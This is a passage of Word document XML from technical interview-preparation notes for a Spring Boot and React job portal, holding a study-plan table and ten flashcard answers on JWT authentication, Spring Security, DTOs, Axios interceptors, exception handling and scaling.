            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3-Hour Master Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1. Complete 1-hour review items above.</w:t>
              <w:br/>
              <w:t>2. Inspect code snippets in Section 20 (JwtAuthenticationFilter and ApplicationService).</w:t>
              <w:br/>
              <w:t>3. Walk through all 14 screens in the UI Deep Dive.</w:t>
              <w:br/>
              <w:t>4. Study difficult follow-up edge cases and senior defense strategies (Sections 33 &amp; 35).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Full-Day (8-Hour) Total Mastery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1. Execute both backend and frontend locally; verify test suite passing.</w:t>
              <w:br/>
              <w:t>2. Follow the 12-Level Beginner-to-Expert Learning Path step-by-step.</w:t>
              <w:br/>
              <w:t>3. Practice speaking all interview answers aloud until completely natural.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>39.3 Top 10 Critical Flashcard Questions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4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>High-Yield Interview Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Immediate Flawless Technical Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1. What happens when a user logs in?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/auth/login validates BCrypt password hash. If valid, JwtUtil creates token signed with HMAC-SHA256 containing username and role. Client stores it in localStorage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2. How is authorization handled on API routes?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring SecurityFilterChain defines antMatchers. Requests pass through JwtAuthenticationFilter which sets SecurityContextHolder. Methods/routes enforce hasRole('RECRUITER') etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3. Why use DTOs instead of exposing JPA Entities directly?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DTOs prevent Mass Assignment vulnerabilities, avoid infinite circular JSON recursion caused by bidirectional JPA relationships, and allow decoupling API contracts from database schemas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4. How does the frontend attach the JWT token?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Axios request interceptor in services/api.js intercepts outgoing requests, reads 'token' from localStorage, and appends 'Authorization: Bearer &lt;token&gt;' header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5. What happens when a token expires?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Axios response interceptor catches 401 Unauthorized, purges localStorage, updates AuthContext state to null, and redirects user to /login.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6. How are duplicate job applications prevented?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ApplicationService checks existsByJobAndCandidate() before insertion, and the database enforces a UNIQUE constraint on (job_id, candidate_id).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7. Why did you use H2 database?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Zero-configuration in-memory persistence with fast startup for development and testing. Production uses PostgreSQL with identical JPA entity mappings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8. How does recruiter status update notify the candidate?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ApplicationService.updateStatus() updates Application.status and synchronously creates a Notification record mapped to the candidate User.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9. How do you handle exceptions globally in Spring Boot?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GlobalExceptionHandler class annotated with @RestControllerAdvice uses @ExceptionHandler methods to return standardized ApiError JSON payloads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10. How would you scale this system to 1 million users?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Introduce Redis caching for job listings, add Read Replicas for the database, use Kafka for async application processing, and containerize backend pods in Kubernetes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:headerReference w:type="default" r:id="rId9"/>
      <w:footerReference w:type="default" r:id="rId10"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1296" w:right="1296" w:bottom="1296"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Master Technical Interview Preparation Notes | GlobalCo-JobBoard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GlobalCo Job Portal — Master Technical Architecture &amp; Interview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475569"/>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475569"/>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